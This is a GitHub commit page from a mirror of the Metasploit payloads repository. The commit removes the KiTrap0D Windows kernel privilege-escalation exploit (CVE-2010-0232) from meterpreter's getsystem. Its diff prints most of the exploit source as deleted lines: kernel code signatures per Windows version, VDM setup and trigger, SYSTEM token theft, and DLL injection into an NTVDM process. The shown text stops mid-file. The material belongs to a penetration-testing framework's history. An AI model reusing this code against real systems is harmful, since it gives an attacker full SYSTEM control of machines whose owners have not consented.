github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-02-28 06:13:03 +01:00
Code Releases Activity

Land #51, @OJ deletion of kitrap0d from getsystem

Browse Source
This commit is contained in:
jvazquez-r7 2013-11-14 08:41:31 -06:00
commit fb7a00ec35
10 changed files with 3 additions and 814 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
c/meterpreter/source/elevator/elevator.c
View File

@ -8,7 +8,6 @@
#include "elevator.h"
#include "namedpipeservice.h"
#include "tokendup.h"
#include "kitrap0d.h"
// define this as we are going to be injected via LoadRemoteLibraryR
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
@ -48,7 +47,7 @@ DWORD elevator_command_dword( char * cpCommandLine, char * cpCommand )
/*
* Grab a int value out of the command line.
* e.g. elevator_command_dword( "/FOO:12345 /BAR:54321", "/FOO:" ) == 12345
* e.g. elevator_command_int( "/FOO:12345 /BAR:54321", "/FOO:" ) == 12345
*/
int elevator_command_int( char * cpCommandLine, char * cpCommand )
{
@ -92,24 +91,7 @@ VOID elevator_main( char * cpCommandLine )
dprintf( "[ELEVATOR] elevator_main. lpCmdLine=%s", cpCommandLine );
if( strstr( cpCommandLine, "/KITRAP0D" ) )
{
DWORD dwProcessId = 0;
DWORD dwKernelBase = 0;
DWORD dwOffset = 0;
dwProcessId = elevator_command_dword( cpCommandLine, "/VDM_TARGET_PID:" );
dwKernelBase = elevator_command_dword( cpCommandLine, "/VDM_TARGET_KRN:" );
dwOffset = elevator_command_dword( cpCommandLine, "/VDM_TARGET_OFF:" );
if( !dwProcessId || !dwKernelBase )
break;
elevator_kitrap0d( dwProcessId, dwKernelBase, dwOffset );
// ...we should never return here...
}
else if( strstr( cpCommandLine, "/t:" ) )
if( strstr( cpCommandLine, "/t:" ) )
{
DWORD dwThreadId = 0;

355
c/meterpreter/source/elevator/kitrap0d.c
View File

@ -1,355 +0,0 @@
// A port of HDM's/Pusscat's implementation of Tavis Ormandy's code (vdmexploit.c).
// http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include "elevator.h"
#include "kitrap0d.h"
#include <winerror.h>
#include <winternl.h>
#include <stddef.h>
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include <ntstatus.h>
#ifdef _WIN64
/*
* This is not implemented for the x64 build.
*/
VOID elevator_kitrap0d( DWORD dwProcessId, DWORD dwKernelBase, DWORD dwOffset )
{
return;
}
#else
/*
* The global variables used...
*/
static DWORD dwTargetProcessId = 0;
static DWORD * lpKernelStackPointer = NULL;
static HMODULE hKernel = NULL;
/*
* Find an exported kernel symbol by name.
*/
PVOID elevator_kitrap0d_kernelgetproc( PSTR SymbolName )
{
PUCHAR ImageBase = NULL;
PULONG NameTable = NULL;
PULONG FunctionTable = NULL;
PUSHORT OrdinalTable = NULL;
PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
PIMAGE_DOS_HEADER DosHeader = NULL;
PIMAGE_NT_HEADERS PeHeader = NULL;
DWORD i = 0;
ImageBase = (PUCHAR)hKernel;
DosHeader = (PIMAGE_DOS_HEADER)ImageBase;
PeHeader = (PIMAGE_NT_HEADERS)(ImageBase + DosHeader->e_lfanew);
ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(ImageBase + PeHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Find required tables from the ExportDirectory...
NameTable = (PULONG)(ImageBase + ExportDirectory->AddressOfNames);
FunctionTable = (PULONG)(ImageBase + ExportDirectory->AddressOfFunctions);
OrdinalTable = (PUSHORT)(ImageBase + ExportDirectory->AddressOfNameOrdinals);
// Scan each entry for a matching name.
for( i=0 ; i < ExportDirectory->NumberOfNames ; i++ )
{
PCHAR Symbol = ImageBase + NameTable[i];
if( strcmp( Symbol, SymbolName ) == 0 )
{
// Symbol found, return the appropriate entry from FunctionTable.
return (PVOID)( ImageBase + FunctionTable[OrdinalTable[i]] );
}
}
// Symbol not found, this is likely fatal :-(
return NULL;
}
/*
* Replace a value if it falls between a given range.
*/
BOOL elevator_kitrap0d_checkandreplace( PDWORD checkMe, DWORD rangeStart, DWORD rangeEnd, DWORD value )
{
if( *checkMe >= rangeStart && *checkMe <= rangeEnd )
{
*checkMe = value;
return TRUE;
}
else
{
return FALSE;
}
}
/*
* Search the specified data structure for a member with CurrentValue.
*/
BOOL elevator_kitrap0d_findandreplace( PDWORD Structure, DWORD CurrentValue, DWORD NewValue, DWORD MaxSize, BOOL ObjectRefs)
{
DWORD i = 0;
DWORD Mask = 0;
// Microsoft QWORD aligns object pointers, then uses the lower three
// bits for quick reference counting (nice trick).
Mask = ObjectRefs ? ~7 : ~0;
// Mask out the reference count.
CurrentValue &= Mask;
// Scan the structure for any occurrence of CurrentValue.
for( i = 0 ; i < MaxSize ; i++ )
{
if( (Structure[i] & Mask) == CurrentValue )
{
// And finally, replace it with NewValue.
Structure[i] = NewValue;
return TRUE;
}
}
// Member not found.
return FALSE;
}
/*
* This routine is where we land after successfully triggering the vulnerability.
*/
#pragma warning(disable: 4731)
VOID elevator_kitrap0d_firststage( VOID )
{
FARPROC DbgPrint = NULL;
FARPROC PsGetCurrentThread = NULL;
FARPROC PsGetCurrentThreadStackBase = NULL;
FARPROC PsGetCurrentThreadStackLimit = NULL;
FARPROC PsLookupProcessByProcessId = NULL;
FARPROC PsReferencePrimaryToken = NULL;
FARPROC ZwTerminateProcess = NULL;
PVOID CurrentThread = NULL;
PVOID TargetProcess = NULL;
PVOID * PsInitialSystemProcess = NULL;
HANDLE pret = NULL;
DWORD StackBase = 0;
DWORD StackLimit = 0;
DWORD NewStack = 0;
DWORD i = 0;
DWORD dwEThreadOffsets[] = {
0x6, // WinXP SP3, VistaSP2
0xA // Windows 7, VistaSP1
};
// Keep interrupts off until we've repaired the KTHREAD.
__asm cli
// Resolve some routines we need from the kernel export directory
DbgPrint = elevator_kitrap0d_kernelgetproc( "DbgPrint" );
PsGetCurrentThread = elevator_kitrap0d_kernelgetproc( "PsGetCurrentThread" );
PsGetCurrentThreadStackBase = elevator_kitrap0d_kernelgetproc( "PsGetCurrentThreadStackBase" );
PsGetCurrentThreadStackLimit = elevator_kitrap0d_kernelgetproc( "PsGetCurrentThreadStackLimit" );
PsInitialSystemProcess = elevator_kitrap0d_kernelgetproc( "PsInitialSystemProcess" );
PsLookupProcessByProcessId = elevator_kitrap0d_kernelgetproc( "PsLookupProcessByProcessId" );
PsReferencePrimaryToken = elevator_kitrap0d_kernelgetproc( "PsReferencePrimaryToken" );
ZwTerminateProcess = elevator_kitrap0d_kernelgetproc( "ZwTerminateProcess" );
CurrentThread = (PVOID)PsGetCurrentThread();
StackLimit = (DWORD)PsGetCurrentThreadStackLimit();
StackBase = (DWORD)PsGetCurrentThreadStackBase();
NewStack = StackBase - ( (StackBase - StackLimit) / 2 );
// First we need to repair the CurrentThread, find all references to the fake kernel
// stack and repair them. Note that by "repair" we mean randomly point them
// somewhere inside the real stack.
// Walk only the offsets that could possibly be bad based on testing, and see if they need
// to be swapped out. O(n^2) -> O(c) wins the race!
for( i=0 ; i < sizeof(dwEThreadOffsets) / sizeof (DWORD) ; i++ )
elevator_kitrap0d_checkandreplace( (((PDWORD) CurrentThread)+dwEThreadOffsets[i]), (DWORD)&lpKernelStackPointer[0], (DWORD)&lpKernelStackPointer[KSTACKSIZE - 1], (DWORD)NewStack );
// Find the EPROCESS structure for the process we want to escalate
if( PsLookupProcessByProcessId( dwTargetProcessId, &TargetProcess ) == STATUS_SUCCESS )
{
PACCESS_TOKEN SystemToken = NULL;
PACCESS_TOKEN TargetToken = NULL;
// What's the maximum size the EPROCESS structure is ever likely to be?
CONST DWORD MaxExpectedEprocessSize = 0x200;
// DbgPrint("PsLookupProcessByProcessId(%u) => %p\n", TargetPid, TargetProcess);
//DbgPrint("PsInitialSystemProcess @%p\n", *PsInitialSystemProcess);
// Find the Token object for my target process, and the SYSTEM process.
TargetToken = (PACCESS_TOKEN)PsReferencePrimaryToken( TargetProcess );
SystemToken = (PACCESS_TOKEN)PsReferencePrimaryToken( *PsInitialSystemProcess );
//DbgPrint("PsReferencePrimaryToken(%p) => %p\n", TargetProcess, TargetToken);
//DbgPrint("PsReferencePrimaryToken(%p) => %p\n", *PsInitialSystemProcess, SystemToken);
// Find the token in the target process, and replace with the system token.
elevator_kitrap0d_findandreplace( (PDWORD)TargetProcess, (DWORD)TargetToken, (DWORD)SystemToken, MaxExpectedEprocessSize, TRUE );
// Success
pret = (HANDLE)'w00t';
}
else
{
// Maybe the user closed the window?
// Report this failure
pret = (HANDLE)'LPID';
}
__asm
{
mov eax, -1 // ZwCurrentProcess macro returns -1
mov ebx, NewStack
mov ecx, pret
mov edi, ZwTerminateProcess
mov esp, ebx // Swap the stack back to kernel-land
mov ebp, ebx // Swap the frame pointer back to kernel-land
sub esp, 256
push ecx // Push the return code
push eax // Push the process handle
sti // Restore interrupts finally
call edi // Call ZwTerminateProcess
__emit 0xCC; // Hope we never end up here
};
}
#pragma warning(default: 4731)
/*
* Setup a minimal execution environment to satisfy NtVdmControl().
*/
BOOL elevator_kitrap0d_initvdmsubsystem( VOID )
{
DWORD dwResult = ERROR_SUCCESS;
FARPROC pNtAllocateVirtualMemory = NULL;
FARPROC pNtFreeVirtualMemory = NULL;
FARPROC pNtVdmControl = NULL;
PBYTE BaseAddress = (PVOID)0x00000001;
HMODULE hNtdll = NULL;
ULONG RegionSize = 0;
static DWORD TrapHandler[128] = {0};
static DWORD IcaUserData[128] = {0};
static struct {
PVOID TrapHandler;
PVOID IcaUserData;
} InitData;
do
{
hNtdll = GetModuleHandle( "ntdll" );
if( !hNtdll )
BREAK_WITH_ERROR( "[ELEVATOR-KITRAP0D] elevator_kitrap0d_initvdmsubsystem. GetModuleHandle ntdll failed", ERROR_INVALID_PARAMETER );
pNtAllocateVirtualMemory = GetProcAddress( hNtdll, "NtAllocateVirtualMemory" );
pNtFreeVirtualMemory = GetProcAddress( hNtdll, "NtFreeVirtualMemory" );
pNtVdmControl = GetProcAddress( hNtdll, "NtVdmControl" );
if( !pNtAllocateVirtualMemory || !pNtFreeVirtualMemory || !pNtVdmControl )
BREAK_WITH_ERROR( "[ELEVATOR-KITRAP0D] elevator_kitrap0d_initvdmsubsystem. invalid params", ERROR_INVALID_PARAMETER );
InitData.TrapHandler = TrapHandler;
InitData.IcaUserData = IcaUserData;
// Remove anything currently mapped at NULL
pNtFreeVirtualMemory( GetCurrentProcess(), &BaseAddress, &RegionSize, MEM_RELEASE );
BaseAddress = (PVOID)0x00000001;
RegionSize = (ULONG)0x00100000;
// Allocate the 1MB virtual 8086 address space.
if( pNtAllocateVirtualMemory( GetCurrentProcess(), &BaseAddress, 0, &RegionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ) != STATUS_SUCCESS )
BREAK_WITH_ERROR( "[ELEVATOR-KITRAP0D] elevator_kitrap0d_initvdmsubsystem. NtAllocateVirtualMemory failed", 'NTAV' );
// Finalise the initialisation.
if( pNtVdmControl( VdmInitialize, &InitData ) != STATUS_SUCCESS )
BREAK_WITH_ERROR( "[ELEVATOR-KITRAP0D] elevator_kitrap0d_initvdmsubsystem. NtVdmControl failed", 'VDMC' );
return TRUE;
} while( 0 );
ExitThread( dwResult );
return FALSE;
}
/*
* (CVE-2010-0232)
*/
VOID elevator_kitrap0d( DWORD dwProcessId, DWORD dwKernelBase, DWORD dwOffset )
{
DWORD dwResult = ERROR_SUCCESS;
FARPROC pNtVdmControl = NULL;
HMODULE hNtdll = NULL;
DWORD dwKernelStack[KSTACKSIZE] = {0};
VDMTIB VdmTib = {0};
DWORD dwMinimumExpectedVdmTibSize = 0x200;
DWORD dwMaximumExpectedVdmTibSize = 0x800;
do
{
dprintf( "[ELEVATOR-KITRAP0D] elevator_kitrap0d. dwProcessId=%d, dwKernelBase=0x%08X, dwOffset=0x%08X", dwProcessId, dwKernelBase, dwOffset );
memset( &VdmTib, 0, sizeof( VDMTIB ) );
memset( &dwKernelStack, 0, KSTACKSIZE * sizeof( DWORD ) );
// XXX: Windows 2000 forces the thread to exit with 0x80 if Padding3 is filled with junk.
// With a buffer full of NULLs, the exploit never finds the right size.
// This will require a more work to resolve, for just keep the padding zero'd
hNtdll = GetModuleHandle( "ntdll" );
if( !hNtdll )
BREAK_WITH_ERROR( "[ELEVATOR-KITRAP0D] elevator_kitrap0d. GetModuleHandle ntdll failed", ERROR_INVALID_PARAMETER );
pNtVdmControl = GetProcAddress( hNtdll, "NtVdmControl" );
if( !pNtVdmControl )
BREAK_ON_ERROR( "[ELEVATOR-KITRAP0D] elevator_kitrap0d. GetProcAddress NtVdmControl failed" );
dwTargetProcessId = dwProcessId;
// Setup the fake kernel stack, and install a minimal VDM_TIB...
lpKernelStackPointer = (DWORD *)&dwKernelStack;
dwKernelStack[0] = (DWORD)&dwKernelStack[8]; // ESP
dwKernelStack[1] = (DWORD)NtCurrentTeb(); // TEB
dwKernelStack[2] = (DWORD)NtCurrentTeb(); // TEB
dwKernelStack[7] = (DWORD)elevator_kitrap0d_firststage; // RETURN ADDRESS
hKernel = (HMODULE)dwKernelBase;
VdmTib.Size = dwMinimumExpectedVdmTibSize;
*NtCurrentTeb()->Reserved4 = &VdmTib;
// Initialize the VDM Subsystem...
elevator_kitrap0d_initvdmsubsystem();
VdmTib.Size = dwMinimumExpectedVdmTibSize;
VdmTib.VdmContext.SegCs = 0x0B;
VdmTib.VdmContext.Esi = (DWORD)&dwKernelStack;
VdmTib.VdmContext.Eip = dwKernelBase + dwOffset;
VdmTib.VdmContext.EFlags = EFLAGS_TF_MASK;
*NtCurrentTeb()->Reserved4 = &VdmTib;
// Allow thread initialization to complete. Without is, there is a chance
// of a race in KiThreadInitialize's call to SwapContext
Sleep( 1000 );
// Trigger the vulnerable code via NtVdmControl()...
while( VdmTib.Size++ < dwMaximumExpectedVdmTibSize )
pNtVdmControl( VdmStartExecution, NULL );
} while( 0 );
// Unable to find correct VdmTib size.
ExitThread('VTIB');
}
#endif

30
c/meterpreter/source/elevator/kitrap0d.h
View File

@ -1,30 +0,0 @@
#ifndef _METERPRETER_SOURCE_ELEVATOR_KITRAP0D_H
#define _METERPRETER_SOURCE_ELEVATOR_KITRAP0D_H
#define KSTACKSIZE 1024
#define EFLAGS_TF_MASK 0x00000100 // trap flag
#ifndef PAGE_SIZE
#define PAGE_SIZE 0x1000
#endif
enum
{
VdmStartExecution = 0,
VdmInitialize = 3
};
typedef struct _VDMTIB
{
ULONG Size;
PVOID Padding0;
PVOID Padding1;
CONTEXT Padding2;
CONTEXT VdmContext;
DWORD Padding3[1024];
} VDMTIB, * LPVDMTIB;
VOID elevator_kitrap0d( DWORD dwProcessId, DWORD dwKernelBase, DWORD dwOffset );
#endif

9
c/meterpreter/source/extensions/priv/server/elevate/elevate.c
View File

@ -5,7 +5,6 @@
#include "precomp.h"
#include "namedpipe.h"
#include "tokendup.h"
#include "kitrap0d.h"
/*!
* @brief Get the native architecture of the system we are running on. (ripped from the stdapi's ps.c)
@ -105,14 +104,6 @@ DWORD elevate_getsystem( Remote * remote, Packet * packet )
break;
}
}
if( dwTechnique == ELEVATE_TECHNIQUE_ANY || dwTechnique == ELEVATE_TECHNIQUE_EXPLOIT_KITRAP0D ) {
dprintf( "[ELEVATE] Attempting ELEVATE_TECHNIQUE_EXPLOIT_KITRAP0D (%u)", ELEVATE_TECHNIQUE_EXPLOIT_KITRAP0D );
if ( (dwResult = elevate_via_exploit_kitrap0d( remote, packet )) == ERROR_SUCCESS ) {
dwTechnique = ELEVATE_TECHNIQUE_EXPLOIT_KITRAP0D;
break;
}
}
} while( 0 );
if( response )

1
c/meterpreter/source/extensions/priv/server/elevate/elevate.h
View File

@ -10,7 +10,6 @@
#define ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE 1 ///< Identifier for the Named Pipe service tecnique (#1)
#define ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 2 ///< Identifier for the Named Pipe service tecnique (#2)
#define ELEVATE_TECHNIQUE_SERVICE_TOKENDUP 3 ///< Identifier for the Token Duplication service technique.
#define ELEVATE_TECHNIQUE_EXPLOIT_KITRAP0D 4 ///< Identifier for the Kitrap0d exploit technique.
typedef void (WINAPI * GETNATIVESYSTEMINFO)( LPSYSTEM_INFO lpSystemInfo ); ///< Stolen from ps.h

358
c/meterpreter/source/extensions/priv/server/elevate/kitrap0d.c
View File

@ -1,358 +0,0 @@
// A port of HDM's/Pusscat's implementation of Tavis Ormandy's code (vdmallowed.c).
// http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
// Known Bugs:
// * Windows NT4 fails to map the NULL page, (exit code 'NTAV').
// * Windows 2000 fails to find the VDM_TIB size (something else is wrong)
// * Windows 2008 Storage Server has 16-bit applications disabled by default
// * Windows 2008 Storage Server is also missing twunk_16.exe, has debug.exe
#include "precomp.h"
#include "kitrap0d.h"
#include "../../../../ReflectiveDLLInjection/LoadLibraryR.h"
// These are generated using kd -kl -c 'db nt!Ki386BiosCallReturnAddress;q'
struct CodeSignature CodeSignatures[] = {
{ "\x64\xA1\x1C\x00\x00\x00\x5A\x89\x50\x04\x8B\x88\x24\x01\x00\x00", 0 }, // Windows NT4
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84", 1 }, // Windows 2000
{ "\x64\xA1\x1C\x00\x00\x00\x5F\x8B\x70\x04\xB9\x84\x00\x00\x00\x89", 1 }, // Windows 2000 SP4 Advanced Server
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84", 2 }, // Windows XP
{ "\xA1\x1C\xF0\xDF\xFF\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00\x00", 3 }, // Windows 2003
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 3 }, // Windows .NET
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 4 }, // Windows Vista
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 5 }, // Windows 2008
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 6 }, // Windows 7
{ "", -1 }
};
/*
* Scan the appropriate kernel image for the correct offset
*/
BOOL kitrap0d_scan_kernel( PDWORD KernelBase, PDWORD OffsetFromBase )
{
DWORD dwResult = ERROR_SUCCESS;
FARPROC NtQuerySystemInformation = NULL;
HMODULE hKernel = NULL;
HMODULE hNtdll = NULL;
PIMAGE_DOS_HEADER DosHeader = NULL;
PIMAGE_NT_HEADERS PeHeader = NULL;
PIMAGE_OPTIONAL_HEADER OptHeader = NULL;
PBYTE ImageBase = NULL;
HKEY MmHandle = NULL;
OSVERSIONINFO os = {0};
SYSTEM_MODULE_INFORMATION ModuleInfo = {0};
DWORD PhysicalAddressExtensions = 0;
DWORD DataSize = 0;
ULONG i = 0;
ULONG x = 0;
// List of versions we have code signatures for.
enum {
MICROSOFT_WINDOWS_NT4 = 0,
MICROSOFT_WINDOWS_2000 = 1,
MICROSOFT_WINDOWS_XP = 2,
MICROSOFT_WINDOWS_2003 = 3,
MICROSOFT_WINDOWS_VISTA = 4,
MICROSOFT_WINDOWS_2008 = 5,
MICROSOFT_WINDOWS_7 = 6,
} Version = MICROSOFT_WINDOWS_7;
do
{
hNtdll = GetModuleHandle("ntdll");
if( !hNtdll )
BREAK_WITH_ERROR( "[KITRAP0D] kitrap0d_scan_kernel. GetModuleHandle ntdll failed", ERROR_INVALID_HANDLE );
// NtQuerySystemInformation can be used to find kernel base address
NtQuerySystemInformation = GetProcAddress( hNtdll, "NtQuerySystemInformation" );
if( !NtQuerySystemInformation )
BREAK_WITH_ERROR( "[KITRAP0D] kitrap0d_scan_kernel. GetProcAddress NtQuerySystemInformation failed", ERROR_INVALID_HANDLE );
// Determine kernel version so that the correct code signature is used
os.dwOSVersionInfoSize = sizeof( OSVERSIONINFO );
if( !GetVersionEx( &os ) )
BREAK_ON_ERROR( "[KITRAP0D] kitrap0d_scan_kernel. GetVersionEx failed" );
dprintf( "[KITRAP0D] kitrap0d_scan_kernel. GetVersionEx() => %u.%u", os.dwMajorVersion, os.dwMinorVersion);
if( os.dwMajorVersion == 4 && os.dwMinorVersion == 0 )
Version = MICROSOFT_WINDOWS_NT4;
if( os.dwMajorVersion == 5 && os.dwMinorVersion == 0 )
Version = MICROSOFT_WINDOWS_2000;
if( os.dwMajorVersion == 5 && os.dwMinorVersion == 1 )
Version = MICROSOFT_WINDOWS_XP;
if( os.dwMajorVersion == 5 && os.dwMinorVersion == 2 )
Version = MICROSOFT_WINDOWS_2003;
if( os.dwMajorVersion == 6 && os.dwMinorVersion == 0 )
Version = MICROSOFT_WINDOWS_VISTA;
if( os.dwMajorVersion == 6 && os.dwMinorVersion == 0 )
Version = MICROSOFT_WINDOWS_2008;
if( os.dwMajorVersion == 6 && os.dwMinorVersion == 1 )
Version = MICROSOFT_WINDOWS_7;
// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address
NtQuerySystemInformation( SystemModuleInformation, &ModuleInfo, sizeof( ModuleInfo ), NULL );
dprintf( "[KITRAP0D] kitrap0d_scan_kernel. NtQuerySystemInformation() => %s@%p", ModuleInfo.Module[0].ImageName, ModuleInfo.Module[0].Base );
// Load the kernel image specified
hKernel = LoadLibrary( strrchr( ModuleInfo.Module[0].ImageName, '\\' ) + 1 );
if( !hKernel )
BREAK_ON_ERROR( "[KITRAP0D] kitrap0d_scan_kernel. LoadLibrary failed" );
// Parse image headers
*KernelBase = (DWORD)ModuleInfo.Module[0].Base;
ImageBase = (PBYTE)hKernel;
DosHeader = (PIMAGE_DOS_HEADER)ImageBase;
PeHeader = (PIMAGE_NT_HEADERS)(ImageBase + DosHeader->e_lfanew);
OptHeader = &PeHeader->OptionalHeader;
dprintf( "[KITRAP0D] kitrap0d_scan_kernel. Searching for kernel %u.%u signature: version %d...", os.dwMajorVersion, os.dwMinorVersion, Version );
for( x=0 ; ; x++ )
{
if( CodeSignatures[x].Version == -1 )
break;
if( CodeSignatures[x].Version != Version )
continue;
dprintf( "[KITRAP0D] kitrap0d_scan_kernel. Trying signature with index %d", x );
// Scan for the appropriate signature...
for( i = OptHeader->BaseOfCode ; i < OptHeader->SizeOfCode ; i++ )
{
if( memcmp( &ImageBase[i], CodeSignatures[x].Signature, sizeof CodeSignatures[x].Signature ) == 0 )
{
dprintf( "[KITRAP0D] kitrap0d_scan_kernel. Signature found %#x bytes from kernel base", i );
*OffsetFromBase = i;
FreeLibrary( hKernel );
return TRUE;
}
}
}
} while( 0 );
dprintf( "[KITRAP0D] kitrap0d_scan_kernel. Code not found, the signatures need to be updated for this kernel" );
if( hKernel )
FreeLibrary( hKernel );
return FALSE;
}
/*
* Grab a useful Handle to NTVDM.
*/
BOOL kitrap0d_spawn_ntvdm( char * cpProgram, HANDLE * hProcess )
{
DWORD dwResult = ERROR_SUCCESS;
PROCESS_INFORMATION pi = {0};
STARTUPINFO si = {0};
ULONG i = 0;
do
{
si.cb = sizeof( STARTUPINFO );
// Start the child process, which should invoke NTVDM...
if( !CreateProcess( cpProgram, cpProgram, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
BREAK_ON_ERROR( "[KITRAP0D] kitrap0d_spawn_ntvdm. CreateProcess failed" );
dprintf( "[KITRAP0D] kitrap0d_spawn_ntvdm. CreateProcess(\"%s\") => %u", cpProgram, pi.dwProcessId );
// Get more access
*hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_TERMINATE, FALSE, pi.dwProcessId );
if( *hProcess == NULL )
{
TerminateProcess( pi.hProcess, 'SPWN' );
CloseHandle( pi.hThread );
CloseHandle( pi.hProcess );
BREAK_ON_ERROR( "[KITRAP0D] kitrap0d_spawn_ntvdm. OpenProcess failed" );
}
dprintf( "[KITRAP0D] kitrap0d_spawn_ntvdm. OpenProcess(%u) => %#x", pi.dwProcessId, *hProcess );
CloseHandle( pi.hThread );
CloseHandle( pi.hProcess );
} while( 0 );
if( dwResult == ERROR_SUCCESS )
return TRUE;
return FALSE;
}
/*
* Find a suitable exe to host the exploit in.
*/
BOOL elevate_via_exploit_getpath( char *cpOutput, DWORD dwOutputSize )
{
DWORD dwResult = ERROR_SUCCESS;
char cWinDir[MAX_PATH] = {0};
DWORD dwIndex = 0;
char * cpFiles[] = { "twunk_16.exe",
"debug.exe",
"system32\\debug.exe",
NULL };
do
{
if( !GetWindowsDirectory( cWinDir, MAX_PATH ) )
BREAK_ON_ERROR( "[KITRAP0D] elevate_via_exploit_getpath. GetWindowsDirectory failed" );
while( TRUE )
{
char * cpFileName = cpFiles[dwIndex];
if( !cpFileName )
break;
if ( _snprintf_s( cpOutput, dwOutputSize, dwOutputSize - 1, "%s%s%s", cWinDir,
cWinDir[ strlen(cWinDir) - 1 ] == '\\' ? "" : "\\", cpFileName ) == -1 )
{
dprintf( "[KITRAP0D] elevate_via_exploit_getpath. Path truncation: %s", cpOutput );
break;
}
dprintf( "[KITRAP0D] elevate_via_exploit_getpath. Trying: %s", cpOutput );
if( GetFileAttributes( cpOutput ) != INVALID_FILE_ATTRIBUTES )
return TRUE;
memset( cpOutput, 0, dwOutputSize );
dwIndex++;
}
} while(0);
return FALSE;
}
/*
* (CVE-2010-0232)
*/
DWORD elevate_via_exploit_kitrap0d( Remote * remote, Packet * packet )
{
DWORD dwResult = ERROR_SUCCESS;
HANDLE hVdm = NULL;
HANDLE hThread = NULL;
LPVOID lpServiceBuffer = NULL;
LPVOID lpRemoteCommandLine = NULL;
char cWinDir[MAX_PATH] = {0};
char cVdmPath[MAX_PATH] = {0};
char cCommandLine[MAX_PATH] = {0};
DWORD dwExitCode = 0;
DWORD dwKernelBase = 0;
DWORD dwOffset = 0;
DWORD dwServiceLength = 0;
do
{
// only works on x86 systems...
if( elevate_getnativearch() != PROCESS_ARCH_X86 )
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. Unsuported platform", ERROR_BAD_ENVIRONMENT );
dprintf( "[KITRAP0D] elevate_via_exploit_kitrap0d. Starting..." );
dwServiceLength = packet_get_tlv_value_uint( packet, TLV_TYPE_ELEVATE_SERVICE_LENGTH );
lpServiceBuffer = packet_get_tlv_value_string( packet, TLV_TYPE_ELEVATE_SERVICE_DLL );
if( !dwServiceLength || !lpServiceBuffer )
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. invalid arguments", ERROR_BAD_ARGUMENTS );
// 1. first get a file path to a suitable exe...
if( !elevate_via_exploit_getpath( cVdmPath, MAX_PATH ) )
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. elevate_via_exploit_getpath failed", ERROR_FILE_NOT_FOUND );
// 2. Scan kernel image for the required code sequence, and find the base address...
if( !kitrap0d_scan_kernel( &dwKernelBase, &dwOffset ) )
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. kitrap0d_scanforcodesignature failed", ERROR_INVALID_HANDLE );
// 3. Invoke the NTVDM subsystem, by launching any MS-DOS executable...
dprintf( "[KITRAP0D] elevate_via_exploit_kitrap0d. Starting the NTVDM subsystem by launching MS-DOS executable" );
if( !kitrap0d_spawn_ntvdm( cVdmPath, &hVdm ) )
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. kitrap0d_spawn_ntvdm failed", ERROR_INVALID_HANDLE );
// 4. Use RDI to inject the elevator dll into the remote NTVDM process...
// Passing in the parameters required by exploit thread via the LoadRemoteLibraryR inject technique.
_snprintf_s( cCommandLine, sizeof(cCommandLine), sizeof(cCommandLine), "/KITRAP0D /VDM_TARGET_PID:0x%08X /VDM_TARGET_KRN:0x%08X /VDM_TARGET_OFF:0x%08X\x00", GetCurrentProcessId(), dwKernelBase, dwOffset );
// alloc some space and write the commandline which we will pass to the injected dll...
lpRemoteCommandLine = VirtualAllocEx( hVdm, NULL, strlen(cCommandLine)+1, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE );
if( !lpRemoteCommandLine )
BREAK_ON_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. VirtualAllocEx failed" );
if( !WriteProcessMemory( hVdm, lpRemoteCommandLine, cCommandLine, strlen(cCommandLine)+1, NULL ) )
BREAK_ON_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. WriteProcessMemory failed" );
// inject the dll...
hThread = LoadRemoteLibraryR( hVdm, lpServiceBuffer, dwServiceLength, lpRemoteCommandLine );
if( !hThread )
BREAK_ON_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. LoadRemoteLibraryR failed" );
// 5. Wait for the thread to complete
dprintf( "[KITRAP0D] elevate_via_exploit_kitrap0d. WaitForSingleObject(%#x, INFINITE);", hThread );
WaitForSingleObject( hThread, INFINITE );
// pass some information back via the exit code to indicate what happened.
GetExitCodeThread( hThread, &dwExitCode );
dprintf( "[KITRAP0D] elevate_via_exploit_kitrap0d. GetExitCodeThread(%#x, %p); => %#x", hThread, &dwExitCode, dwExitCode );
switch( dwExitCode )
{
case 'VTIB':
// A data structure supplied to the kernel called VDM_TIB has to have a 'size' field that
// matches what the kernel expects.
